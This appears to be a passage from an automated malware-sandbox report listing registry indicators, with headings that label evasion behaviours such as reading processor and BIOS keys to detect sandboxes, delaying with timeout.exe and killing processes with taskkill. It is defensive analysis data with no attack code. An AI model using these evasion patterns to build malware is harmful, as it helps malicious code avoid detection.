Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	RuntimeBroker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe

Checks processor information in registry 2 TTPs 21 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1476	timeout.exe

Enumerates system info in registry 2 TTPs 17 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1964	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 22 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sysmon.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	sysmon.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sysmon.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sysmon.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294935296"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "626"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "14"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).top = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\0 = 50003100000000006a594ab010007661756c74003c0009000400efbe6a594ab06a596bb02e000000fa3e020000000e000000000000000000000000000000706f5e007600610075006c007400000014000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = 020000000100000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\2\0\0\NodeSlot = "13"	Explorer.EXE
